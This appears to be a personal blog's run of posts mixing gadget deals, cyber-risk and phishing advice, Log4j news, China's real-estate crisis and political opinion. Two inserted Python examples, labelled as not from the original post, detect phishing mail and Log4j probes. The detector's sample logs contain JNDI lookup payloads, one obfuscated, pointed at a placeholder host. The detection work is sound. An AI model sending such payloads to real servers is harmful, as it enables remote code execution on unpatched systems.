I agree with Daniel Miessler (h/t): some news away from the crazy.
Gadgets 01/15/2022: CES tech, DJI Mavic drone, Best Buy TVs, Galaxy entry level phone
Late stuff from CES:
This is a slick projector, but looks like currently out of stock at both Amazon and Samsung. 180 degrees, speaker sound waves in all directions, streaming apps, playlist, voice assistants. “The projector optimizes screen size, auto-focuses, and levels the image even when pointed on an angle.” Also adjusts the color temperature of the projector to accommodate non-white walls, and has built-in Samsung Smart TV.
https://www.amazon.com/SAMSUNG-Freestyle-Projector-Built-SP-LSP3BLAXZA/dp/B09NDXB72V
New Garmin smartwatch with phone call and voice assistant support, and AMOLED display.
https://www.garmin.com/en-US/p/730659
This is crazy cool stuff. Is foldable tech maturing?
More CES tech
Best of CES 2022: Gaming Gear, PCs, Home Entertainment, Transportation | WIRED
Other stuff:
I’m not a drone guy, but ZDNet raving about this for 2022.
https://www.zdnet.com/article/dji-mavic-3-the-very-best-drone-for-2022
These deals are wow. Want to upgrade one of my TVs.
https://www.zdnet.com/article/snag-these-65-inch-flat-screens-at-best-buy-for-less-than-500
Got one of these entry level phones for my mom. Simple and does all she wants. I really don’t know why you would need anything else.
https://www.samsung.com/us/smartphones/galaxy-s21-5g/buy/galaxy-s21-5g-128gb-unlocked-sm-g991uzaaxaa
New iPhone vuln allows camera use when off
Cyber Risk Assessment, Pt. II
3. Vulnerability Assessment (also known as “security posture assessment”) – An in-depth examination of the assets from the inventory to gauge their weaknesses or vulnerabilities. [Our] vulnerability assessments uncover gaps in your security and drive our overall risk management. While threats can come from both inside and outside your organization, vulnerabilities are internal factors. We look for your organization’s structural flaws and weaknesses, how effective your current safeguards are (vulnerability appraisal), and the weaknesses that remain in spite of them. We capture a picture of your network’s and data’s security. Every possible contingency is gauged for multiple vulnerabilities. Our team’s diverse backgrounds and experience enable us to consider all the weaknesses specific to your organization. Testing cyber infrastructure is an indispensable part of what we do. We use industry-standard tools like Nessus, Nmap, and Metasploit to test for vulnerabilities, examining every available host, service, OS, port and firewall, software and firmware vulnerabilities, unencrypted and sensitive data, and permissions. We may also conduct penetration testing and red team-blue team exercises, and examine the data about you that is online right now and may aid a threat actor’s social engineering tactics.
Business Continuity in the Age of Ransomware
The goal of Disaster Recovery Planning is to enable a company to continue doing business with the least possible interruption. The plan should include:
1. Which data and systems are backed up, along with specifics such as where the backups are kept, how frequently they are made, and how the data can be recovered.
2. Details on network topology, redundancy and agreements with Internet Service Providers.
3. Contact information for the team charged with response and recovery.
4. The process for testing the DRP.
5. A plan for managing the crisis, including dealing with outside contacts, and communicating with the media, law enforcement and legal counsel.
The goal is to decrease the risks of losing critical data.
Ransomware disaster recovery is one of the essential tasks that a company should engage in, but other crises can also be averted or dealt with through this sort of plan.
Make sure to keep Malwarebytes’ NY resolutions
Per Malwarebytes (and me):
Say “yes” to updates
Installing updates promptly is one of the best ways to be more cybersecure. Next time an app offers you an update, click “yes” instead of “no”, “cancel” or “remind me later”. (Do you know where it came from?)
Say “no” to feeble passwords
Strong passwords keep your data safe, so don’t let yourself choose feeble passwords in 2022, and if somebody shares a password with you, or asks for yours, just say “no.” (My passwords are generally very strong with financial, job or security sites.)
Say “woah” to unexpected messages
Scams come in all shapes and sizes, but no matter how they’re dressed up, they always want something valuable, URGENTLY. So don’t be rushed—take your time in 2022.
(Remember: if it sounds too good to be true…)
Geek risk management
An asset provides value to a user or company and has a relative worth.
Assets are people, physical assets (computers, network equipment), and IT assets (HW, SW, data). An asset’s relative worth is determined through its positive economic value and can have different values based on criticality to the organization.
Asset – in this case Joe Dork’s 1990s collection of Star Trek TOS VHS cassettes.
Vulnerability – Unlocked basement door to Dork’s room in parents’ home.
Vector – Going through the unlocked door.
Threat Actor – Beautiful cosplay girl.
Threat – Theft of tapes.
Risk – Stolen VHS.
Not only are your direct assets something to catalog, but you should also assess your supply chain assets, in all steps from supplier to consumer. Vendors should be cataloging their assets and the threats to it. The SolarWinds hack came from a supply chain vulnerability.
There’s zero chance that Dork’s VHS assets will be stolen by any cosplay girl, but you must perform a continuing asset inventory before any exploitation of vulnerabilities takes place.
Puppy training – or the lack thereof
Jax is learning–I hope. This biting problem is a chore to stop. But from my study, relationship is the important part and letting them know that biting is unacceptable. Verbal cues.
China real estate crisis update
The US Federal Reserve warned last year that trouble in Chinese real estate could damage the global economy.
Evergrande stock: China’s property developer suspends trading in Hong Kong – CNN
We should be concerned about IoT devices
The Internet of Things (IoT) sounds like a set of devices we don’t have to worry about, e.g. “it’s only a thermostat (or a bedroom light).” But IoT can also comprise smartphones, printers, self-driving cars, Google Home, Amazon Alexa, Apple HomeKit, wearables, door locks, connected LEDs, laptops, pacemakers, hospital devices, assisted living companions, microchipped animals, smart padlocks (possibly opened by fingerprint), smart toys and other sensors. So systems that were intended to make life easier can also raise security and privacy concerns (baby monitors and toys listening or talking to your child).
Happiest of New Years!
Just thinking of the recovery this year, just a bit. Here’s to hoping the new year will excel. Let Jax take last year out.
Packages and Rescue Packages: Online Consumerism Shields a Brewing Storm
UPDATE 01/03/22 Evergrande stock: China’s property developer suspends trading in Hong Kong – CNN
While we’re shopping from Amazon (or at the mall?), ominous events are taking place in the investment world: China’s largest real estate company, Evergrande—with 200,000 employees and more than 1,300 developments in more than 280 cities–has defaulted on its $300 billion debt. This despite having real estate sales of $110 billion last year. Why is this significant? Never mind the awful consequences of our complete social shutdown—depression, suicide, drinking and drug use, reckless Covid relief and stimulus—the U.S. pension system and insurance funds are heavily invested in the collapsing Chinese real estate bubble and consequently, have lost billions. Other Western nations are in a similar bind.
Americans lost $148 million to gift card scams this year
Gift cards should never be used to pay bills or to pay the government for taxes and the like. Gift cards should only be used to buy gifts.
This goes to show you the wisdom of the elders: if something sounds too good to be true, it probably is. Don’t let your guard down.
Report Gift Cards Used in a Scam | Federal Trade Commission – YouTube
Reminder: Phishing still way up there in terms of compromise
Reminder: Phishing is still the method of compromise most widely used. 91% of cyberattacks use phishing emails. With ransomware, the number is about 70%.
Phishing can be really sophisticated. You may get phishing emails that look exactly like the real thing, and the sites they lead to can use images and layouts copied from the mimicked website.
Spearphishing is a targeted attack against certain individuals at an organization. Whaling is directed at big names at an org, typically a CEO or CFO, or someone with purchasing power, since money transfers are the goal.
Smishing uses SMS (text) messages to get you to click and vishing uses phone calls or voice messages to get a target to do something the threat actor wants.
Don’t click. Don’t open attachments. Don’t even respond.
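The lookalike messages described above share a few tells that a mail gateway or a careful reader can check mechanically: a display name that claims a brand the sender domain does not belong to, a Reply-To that routes answers elsewhere, link text that names one site while the href goes to another, and urgency wording. The following is an added example (not code from the original post) that scores constructed messages on those four indicators; the brand table, the word list and both sample messages are constructed here for illustration.

```python
"""Heuristic phishing triage over constructed sample messages.

Added example; it is not code from the original post. The brand table, the
urgency word list and the two sample messages are all constructed here for
illustration, and the score is a simple count of independent red flags.
"""
import re
from email.utils import parseaddr

# Constructed: brands this organization expects mail from, and their genuine domains.
KNOWN_BRANDS = {
    "paypal": {"paypal.com"},
    "microsoft": {"microsoft.com", "office.com"},
}

# Constructed: wording that pressures the reader to act without thinking.
URGENCY_WORDS = ("urgent", "immediately", "within 24 hours", "suspended", "verify now")

LINK_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def registered_domain(host):
    """Last two labels, so 'paypal.com.evil-example.net' becomes 'evil-example.net'."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def sender_parts(header_value):
    """Split a From/Reply-To header into (display name, registered domain)."""
    name, addr = parseaddr(header_value or "")
    host = addr.rpartition("@")[2].lower()
    return name, registered_domain(host)


def host_of(url):
    """Host portion of an http(s) URL, or '' if the text is not a URL."""
    m = re.match(r"https?://([^/:?#]+)", url.strip(), re.I)
    return m.group(1).lower() if m else ""


def score_message(headers, body_html):
    """Return (score, findings); each finding is one independent phishing indicator."""
    findings = []
    name, from_domain = sender_parts(headers.get("From"))

    # 1. Display name drops a known brand but the mail comes from elsewhere.
    for brand, genuine in KNOWN_BRANDS.items():
        if brand in name.lower() and from_domain not in genuine:
            findings.append(f"display name '{name}' but sender domain {from_domain}")

    # 2. Replies are routed to a different domain than the sender's.
    _, reply_domain = sender_parts(headers.get("Reply-To"))
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from sender {from_domain}")

    # 3. Visible link text names one site while the href points at another.
    for href, text in LINK_RE.findall(body_html):
        shown, actual = host_of(text), host_of(href)
        if shown and actual and registered_domain(shown) != registered_domain(actual):
            findings.append(f"link shows {shown} but goes to {actual}")

    # 4. Pressure to act right now.
    hits = [w for w in URGENCY_WORDS if w in body_html.lower()]
    if hits:
        findings.append("urgency wording: " + ", ".join(hits))

    return len(findings), findings


# Constructed samples: one spoofed message and one that passes every check.
PHISH = (
    {"From": '"PayPal Support" <help@paypal-secure-example.net>',
     "Reply-To": "refunds@evil-example.org"},
    'Your account will be suspended. Verify now within 24 hours: '
    '<a href="http://paypal.com.evil-example.net/login">https://www.paypal.com/signin</a>',
)
LEGIT = (
    {"From": '"Microsoft account team" <noreply@accountprotection.microsoft.com>'},
    'Review your recent sign-in activity: '
    '<a href="https://account.microsoft.com/security">https://account.microsoft.com/security</a>',
)

if __name__ == "__main__":
    for label, (hdrs, body) in (("phish", PHISH), ("legit", LEGIT)):
        score, why = score_message(hdrs, body)
        print(f"{label}: score {score}")
        for line in why:
            print("  -", line)
```

The spoofed sample trips all four checks and the genuine one trips none. None of these indicators is proof on its own (a legitimate mailing service can use a different Reply-To domain), which is why the function returns the list of findings rather than a verdict: a gateway would quarantine above some threshold and a reader would use the list to decide whether to follow the "don't click, don't respond" advice above.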
Merry Christmas!
Trump fading
I am struck by those whom I know who are insistent that the election was fraudulent, but you have to hand it to the Democrats. They got out the vote like they never had before. Now his star is waning.
Encrypted messaging apps mostly keep your privacy
Log4j continued
Merry Christmas.
CISA “published an emergency directive on Friday urging all government agencies to immediately ‘patch’ computer systems to address the Log4j flaw. ‘The Log4j vulnerability is the most serious vulnerability that I have seen in my decades-long career,’ said CISA Director Jen Easterly.”
“Even the Microsoft-owned online video game Minecraft has been affected. Some hackers were apparently able to breach victims by typing a single line of code into the game’s chat box, according to Wired. Microsoft says it has since fixed the issue and is urging players to update their Minecraft software.”
Why is the Log4j cybersecurity flaw the ‘most serious’ in decades? (nypost.com)
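The reason a single line in a chat box was enough is that vulnerable Log4j 2 versions expanded `${...}` lookups, including JNDI lookups, found inside the data they were asked to log. Patching, as CISA directed, is the fix; the complementary defensive step is to look through web and application logs for who has been probing. The following is an added example (not code from the original post) that scans constructed access-log lines for a JNDI lookup, reassembling the keyword when it has been split across nested case lookups; the hostname example.invalid is a placeholder.

```python
"""Flag Log4j-style JNDI lookups in untrusted text (added example, not from the post).

Log4j 2 expanded `${...}` lookups that appeared inside logged data, which is
why one crafted line in a chat box or request header was enough. The fix is to
update Log4j, as CISA directed; this scanner is the complementary detection
step: run it over web logs or request fields to see who is probing. The log
lines below are constructed, with example.invalid as a placeholder host.
"""
import re

# Nested ${lower:X} / ${upper:X} lookups resolve to X (case aside); strip them
# innermost-first so a split-up "jndi" is reassembled before matching.
INNER_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.I)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)


def normalize(text, max_rounds=10):
    """Collapse nested case lookups until the text stops changing."""
    for _ in range(max_rounds):
        collapsed = INNER_RE.sub(lambda m: m.group(1), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookup(line):
    """Return the lookup scheme (ldap, rmi, dns, ...) if the line carries a JNDI lookup, else None."""
    m = JNDI_RE.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return [(line_number, scheme)] for every line that should raise an alert."""
    hits = []
    for n, line in enumerate(lines, start=1):
        scheme = find_jndi_lookup(line)
        if scheme:
            hits.append((n, scheme))
    return hits


# Constructed access-log lines: a plain probe, a case-split probe, and two benign ones.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://example.invalid/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${upper:l}dap://example.invalid/b}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, scheme in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme}")
```

Only the first two lines are reported; the fourth contains a `${...}` lookup that is not JNDI and stays quiet, which keeps the scanner from flagging ordinary templated strings. A hit tells you an address was probing, not that the server was vulnerable, so the follow-up is to confirm the Log4j version on the host and check for outbound connections from it around the timestamp.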
Gadgets 12/18/2021: Galaxy Z Flip 3, Tiles, Portable power station, camping solar panels, Galaxy Tab A7, Surface Pro 8, Ear buds
Want.
https://www.amazon.com/dp/B097CNP994/ref=asc_df_B097CNP9941639738800000
I bought some of these for my mom, but nope, didn’t last long. I’m not one who loses their stuff, but I recommend this one if you do.
https://www.amazon.com/Tile-RE-20002-Pro-2-Pack/dp/B07W73NGMW
Sweet power source Batman!
https://www.amazon.com/Jackery-Portable-Power-Station-Generator/dp/B07D29QNMJ
Also for camping, but I had a small solar panel and it was not impressive.
https://www.amazon.com/Jackery-SolarSaga-Explorer-Portable-Generator/dp/B07PGS2WN8
I do need a new tablet. (I have an old, unused iPad.)
https://www.walmart.com/ip/SAMSUNG-Galaxy-Tab-A7-32GB-10-4-Wi-Fi-Gray-SM-T500NZABXAR/882296471
But if I were to get a Surface… This one is $200 off.
https://www.microsoft.com/en-us/d/surface-pro-8/8qwcrtq8v8xg?icid=deals-page_Store_COUNTDOWN22_R1_CP4_SurfacePro8_121721&activetab=pivot%3aoverviewtab
And if you like ear buds
https://www.walmart.com/ip/Google-Pixel-Buds-A-Series-Truly-Wireless-Earbuds-Audio-Headphones-with-Bluetooth-White/620970985
——
Wired has this story about how Macy’s, Target, Bloomingdales, The North Face, Old Navy and other retailers are on the heels of Amazon with free shipping and 25% off.
https://www.wired.com/story/move-over-amazon-catching-up-macys-target
log4j vuln hits millions of devices
UPDATE 12/15/2021: There is a second vuln in log4j (the patch for the first vulnerability was “incomplete”), and it’s been exploited in the wild.
As Daniel Miessler says “Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:
- The project is maintained by very few people in their spare time for no money, and
- If the project had a major issue it would disrupt the entire internet.
We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint.”
Cybersecurity official warns software vulnerability could affect millions of devices (msn.com)